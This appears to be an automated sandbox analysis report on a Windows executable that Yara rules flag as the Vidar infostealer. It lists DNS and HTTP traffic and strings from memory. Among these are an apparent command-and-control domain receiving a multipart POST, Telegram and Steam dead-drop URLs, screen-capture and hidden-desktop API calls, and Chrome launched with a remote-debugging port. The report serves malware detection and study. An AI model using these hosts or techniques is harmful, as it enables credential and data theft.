          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
          Source: unknownTCP traffic detected without corresponding DNS query: 142.250.74.195
          Source: unknownTCP traffic detected without corresponding DNS query: 2.16.100.168
          Source: unknownTCP traffic detected without corresponding DNS query: 2.16.100.168
          Source: unknownTCP traffic detected without corresponding DNS query: 142.250.74.195
          Source: unknownTCP traffic detected without corresponding DNS query: 2.16.100.168
          Source: unknownTCP traffic detected without corresponding DNS query: 2.16.100.168
          Source: unknownTCP traffic detected without corresponding DNS query: 2.19.96.32
          Source: unknownTCP traffic detected without corresponding DNS query: 2.16.100.168
          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.77.188
          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.77.188
          Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.71
          Source: unknownTCP traffic detected without corresponding DNS query: 2.16.100.168
          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.77.188
          Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.71
          Source: unknownTCP traffic detected without corresponding DNS query: 2.16.100.168
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_00403850 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,0_2_00403850
          Source: global trafficHTTP traffic detected: GET /g_etcontent HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0Host: s.p.formaxprime.co.ukConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEI0qDKAQig4coBCJahywEInP7MAQiFoM0BCMnRzgEIvtXOAQiB1s4BCMjczgEIiuDOAQiu5M4BCIvlzgE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEI0qDKAQig4coBCJahywEInP7MAQiFoM0BCMnRzgEIvtXOAQiB1s4BCMjczgEIiuDOAQiu5M4BCIvlzgE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficDNS traffic detected: DNS query: t.me
          Source: global trafficDNS traffic detected: DNS query: s.p.formaxprime.co.uk
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: apis.google.com
          Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----jwl6xbi589zcbasrq9hlUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0Host: s.p.formaxprime.co.ukContent-Length: 255Connection: Keep-AliveCache-Control: no-cache
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://e5.c.lencr.org/101.crl0
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://e5.i.lencr.org/0
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://e5.o.lencr.org0
          Source: chromecache_69.9.drString found in binary or memory: http://www.broofa.com
          Source: ngbtiladkrthgad.exe, 00000000.00000003.1194026711.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cd
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1825197872.000000000364C000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1825197872.000000000364C000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
          Source: jmym7q.0.drString found in binary or memory: https://ac.ecosia.org?q=
          Source: chromecache_69.9.drString found in binary or memory: https://apis.google.com
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000003.1346023423.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, gdtrim.0.drString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000003.1346023423.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, gdtrim.0.drString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
          Source: jmym7q.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1824410005.00000000033FB000.00000004.00000020.00020000.00000000.sdmp, jmym7q.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1824410005.00000000033FB000.00000004.00000020.00020000.00000000.sdmp, jmym7q.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000003.1346023423.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, gdtrim.0.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000003.1346023423.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, gdtrim.0.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
          Source: jmym7q.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1824410005.00000000033FB000.00000004.00000020.00020000.00000000.sdmp, jmym7q.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
          Source: jmym7q.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: chromecache_69.9.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
          Source: chromecache_69.9.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
          Source: chromecache_69.9.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
          Source: chromecache_69.9.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
          Source: jmym7q.0.drString found in binary or memory: https://gemini.google.com/app?q=
          Source: gdtrim.0.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
          Source: chromecache_69.9.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
          Source: ngbtiladkrthgad.exe, 00000000.00000003.1224317282.000000000066C000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000003.1321478371.000000000066C000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000003.1273724875.000000000066C000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000003.1193910704.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.p.formaxprime.co.uk
          Source: ngbtiladkrthgad.exe, 00000000.00000003.1273724875.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.p.formaxprime.co.uk/
          Source: ngbtiladkrthgad.exe, 00000000.00000003.1248848959.0000000000674000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000003.1297921627.000000000066C000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000003.1248778986.0000000000673000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000003.1321478371.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.p.formaxprime.co.uk/3
          Source: ngbtiladkrthgad.exe, 00000000.00000003.1346023423.00000000006BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.p.formaxprime.co.uk/4p
          Source: ngbtiladkrthgad.exe, 00000000.00000003.1274025459.0000000000673000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000003.1224357665.0000000000672000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000003.1248848959.0000000000674000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000003.1297921627.000000000066C000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000003.1248778986.0000000000673000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000003.1224317282.000000000066C000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000003.1321478371.000000000066C000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000003.1273724875.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.p.formaxprime.co.uk/e
          Source: ngbtiladkrthgad.exe, 00000000.00000003.1224357665.0000000000672000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000003.1248848959.0000000000674000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000003.1248778986.0000000000673000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000003.1224317282.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.p.formaxprime.co.uk/tm
          Source: ngbtiladkrthgad.exe, 00000000.00000003.1224357665.0000000000672000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000003.1224317282.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.p.formaxprime.co.uk3
          Source: ngbtiladkrthgad.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199832267488
          Source: ngbtiladkrthgad.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199832267488dqu220Mozilla/5.0
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1825944490.0000000003A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1825944490.0000000003A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1823139867.00000000005FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
          Source: ngbtiladkrthgad.exeString found in binary or memory: https://t.me/g_etcontent
          Source: ngbtiladkrthgad.exeString found in binary or memory: https://t.me/g_etcontentdqu220Mozilla/5.0
          Source: ngbtiladkrthgad.exe, 00000000.00000003.1194026711.000000000066C000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000002.1823139867.0000000000640000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000003.1196269467.00000000006AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000003.1346023423.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, gdtrim.0.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1824410005.00000000033FB000.00000004.00000020.00020000.00000000.sdmp, jmym7q.0.drString found in binary or memory: https://www.ecosia.org/newtab/v20
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000003.1346023423.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, gdtrim.0.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1824410005.00000000033FB000.00000004.00000020.00020000.00000000.sdmp, jmym7q.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
          Source: chromecache_69.9.drString found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
          Source: chromecache_69.9.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
          Source: chromecache_69.9.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1825944490.0000000003A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1825944490.0000000003A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1825944490.0000000003A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1825944490.0000000003A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1825944490.0000000003A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
          Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49719 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 78.47.63.132:443 -> 192.168.2.4:49720 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 78.47.63.132:443 -> 192.168.2.4:49723 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 78.47.63.132:443 -> 192.168.2.4:49725 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 131.253.33.254:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 78.47.63.132:443 -> 192.168.2.4:49732 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 78.47.63.132:443 -> 192.168.2.4:49733 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 78.47.63.132:443 -> 192.168.2.4:49735 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 78.47.63.132:443 -> 192.168.2.4:49766 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 78.47.63.132:443 -> 192.168.2.4:49767 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 78.47.63.132:443 -> 192.168.2.4:49771 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 78.47.63.132:443 -> 192.168.2.4:49772 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 78.47.63.132:443 -> 192.168.2.4:49776 version: TLS 1.2
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_00410A90 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,malloc,StrCmpCW,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,0_2_00410A90
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_00406480 memcpy,OpenDesktopA,CreateDesktopA,lstrcpyA,CreateProcessA,Sleep,CloseDesktop,0_2_00406480

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: ngbtiladkrthgad.exe, type: SAMPLEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
          Source: 0.0.ngbtiladkrthgad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
          Source: 0.2.ngbtiladkrthgad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_00404A200_2_00404A20
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_004186300_2_00418630
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_0041B7700_2_0041B770
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_0041B3000_2_0041B300
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_0041C1000_2_0041C100
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_004193D00_2_004193D0
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_0041A7D00_2_0041A7D0
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: String function: 00410D00 appears 42 times
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: String function: 0040F5B0 appears 135 times
          Source: ngbtiladkrthgad.exe, 00000000.00000002.1825197872.000000000386E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs ngbtiladkrthgad.exe
          Source: ngbtiladkrthgad.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: ngbtiladkrthgad.exe, type: SAMPLEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
          Source: 0.0.ngbtiladkrthgad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
          Source: 0.2.ngbtiladkrthgad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@22/22@6/6
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeCode function: 0_2_00411250 CreateToolhelp32Snapshot,Process32First,StrCmpCA,Process32Next,StrCmpCA,CloseHandle,0_2_00411250
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\MHHKCJV8.htmJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4276:120:WilError_03
          Source: ngbtiladkrthgad.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1002\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: uaiwlfus2.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: ngbtiladkrthgad.exeVirustotal: Detection: 75%
          Source: ngbtiladkrthgad.exeReversingLabs: Detection: 71%
          Source: unknownProcess created: C:\Users\user\Desktop\ngbtiladkrthgad.exe "C:\Users\user\Desktop\ngbtiladkrthgad.exe"
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
